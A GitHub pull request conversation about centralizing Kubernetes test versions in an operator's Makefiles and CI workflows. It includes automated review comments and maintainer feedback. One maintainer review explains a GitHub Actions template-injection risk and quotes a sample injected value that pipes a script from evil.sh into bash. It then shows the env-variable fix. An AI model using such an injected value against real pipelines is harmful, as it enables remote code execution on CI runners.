ci(operator): centralize Kubernetes test versions#281
Conversation
|
Note Reviews pausedIt looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the Use the following commands to manage reviews:
Use the checkboxes below for quick actions:
📝 WalkthroughWalkthrough
Estimated code review effort🎯 4 (Complex) | ⏱️ ~60 minutes 🚥 Pre-merge checks | ✅ 3 | ❌ 1❌ Failed checks (1 warning)
✅ Passed checks (3 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches🧪 Generate unit tests (beta)
Comment |
There was a problem hiding this comment.
Actionable comments posted: 2
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/operator-ci.yaml:
- Around line 68-84: Add a permissions block to the k8s-test-versions job to
enforce least privilege access. Since this job only checks out the repository
and runs a make command to print version information with no write or deployment
operations, add explicit minimal permissions (such as read-all or restricted
permissions) at the job level to reduce the attack surface if the job were
compromised.
In `@operator/Makefile`:
- Around line 166-179: The validate-kind-node-image target hardcodes docker as
the first choice for container command checking, which ignores the DOCKER_CMD
variable that may be configured to use podman instead. Update the conditional
logic to check for the DOCKER_CMD variable first before falling back to docker,
then podman, and finally curl. This ensures that if DOCKER_CMD is explicitly set
to podman, that preference is honored during image validation rather than
defaulting to docker if it exists on the system.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: ASSERTIVE
Plan: Enterprise
Run ID: 8746bd17-b760-4ccd-be48-1ad24591a61a
📒 Files selected for processing (13)
.github/workflows/agent-ci.yaml.github/workflows/operator-ci.yamldocs/README.mddocs/development.mddocs/kubernetes-support.mdoperator/Makefileoperator/README.mdoperator/api/v1alpha1/webhook_suite_test.gooperator/config/local-dev/ctlptl-config.yamloperator/deps.mkoperator/internal/controller/suite_test.gooperator/internal/testenv/envtest.gooperator/k8s-test-versions.mk
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
d0d2e08 to
9d8e057
Compare
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@operator/internal/testenv/envtest.go`:
- Around line 39-49: The function `BinaryAssetsDirectory` returns bare errors
from `findOperatorRoot()` and `makeDefault()` calls without wrapping them with
context. Wrap both error returns using `fmt.Errorf` with the `%w` verb to
provide diagnostic context, following the pattern `fmt.Errorf("descriptive
message: %w", err)` for each of the two return statements that currently return
bare `err` values.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: ASSERTIVE
Plan: Enterprise
Run ID: 19a32c2d-a2cb-4982-a8b7-691b971b7a57
📒 Files selected for processing (13)
.github/workflows/agent-ci.yaml.github/workflows/operator-ci.yamldocs/README.mddocs/development.mddocs/kubernetes-support.mdoperator/Makefileoperator/README.mdoperator/api/v1alpha1/webhook_suite_test.gooperator/config/local-dev/ctlptl-config.yamloperator/deps.mkoperator/internal/controller/suite_test.gooperator/internal/testenv/envtest.gooperator/k8s-test-versions.mk
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
|
First off, thank you for taking this on. This is thorough work: the validation checklist in the description is excellent, updating the docs in the same PR is exactly right, and My main concern is the mechanism. The new The direction I'd suggest instead: make one source of truth that every consumer reads through a single small reader, and have nothing hand-roll a parser.
This is a bigger change than the immediate bug, so totally reasonable to stage it: if you'd rather keep this PR tight, the minimal version is just the Thanks again for pushing this forward; it's close, and getting the version-reading out of Go would make it solid. |
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
|
i think its ready now, check it out when you have time, thank you |
There was a problem hiding this comment.
This is in good shape and the direction is exactly right. One thing I do want fixed before merge though.
Several of the new steps interpolate ${{ ... }} directly into run: blocks, where the value originates in versions.yaml. GitHub expands those expressions into the shell script as literal text before the shell runs, so a value containing shell metacharacters becomes executable code:
# operator-ci.yaml
make validate-kind-node-image KIND_NODE_IMAGE_VERSION=${{ matrix.k8s-version }}
# agent-ci.yaml
make validate-kind-node-image KIND_NODE_IMAGE_VERSION=${{ steps.k8s-versions.outputs.kind-node-image-version }}A value like 1.35.0; curl evil.sh | bash would terminate the make command and run the rest. The blast radius on today's pull_request trigger is limited, but this workflow also runs on push (post-merge, where the token is read-write), and the pattern is exactly the kind of thing that turns into a real RCE the moment one of these steps moves under pull_request_target or a self-hosted runner. I'd rather not merge a template-injection pattern.
The fix is to bind the value to env: and reference the quoted shell variable, so it's passed as data the shell never parses:
- name: Validate KinD node image
env:
K8S_VERSION: ${{ matrix.k8s-version }}
run: |
cd operator
make validate-kind-node-image KIND_NODE_IMAGE_VERSION="$K8S_VERSION"Same treatment for the other ${{ matrix.* }} / ${{ steps.*.outputs.* }} references that land inside run:.
Signed-off-by: AnouarMohamed <m.anouar@mundiapolis.ma>
|
hmm fair, i Moved the version/matrix values into env vars and quoted them |
|
Same fix for the matrix platform and make target too. |
lockwobr
left a comment
There was a problem hiding this comment.
Thanks for opening this issue and driving it to complete. Everything looks good.
|
I am trying to get #286 before merging this, will merge later today is my plan. |
Summary
operator/k8s-test-versions.mkas the owner for envtest, Kind node image, Kind binary, and CI matrix versionskindest/nodetags before Kind cluster creationBinaryAssetsDirectoryin Go suites from the centralized version owner instead of hard-coded pathsNotes
upstream/mainalready uses envtest1.36.0while local/CI Kind node images remain on1.35.0. This keeps those current values and documents the intentional split because Kind does not publish every Kubernetes patch version.Closes #238.
Validation
make -C operator print-k8s-test-versions-github-outputmake -C operator envtestmake -C operator render-ctlptl-configmake -C operator validate-kind-node-imagemake -C operator validate-kind-node-image DOCKER_CMD=podmanwith a temporary Podman shim to confirmDOCKER_CMDis preferredmake -C operator -n create-kind-clustermake -C operator -n create-deployment-policy-clustercd operator && make unit-tests(first run hit an envtest1.36.0startup timeout; retry passed)git diff --check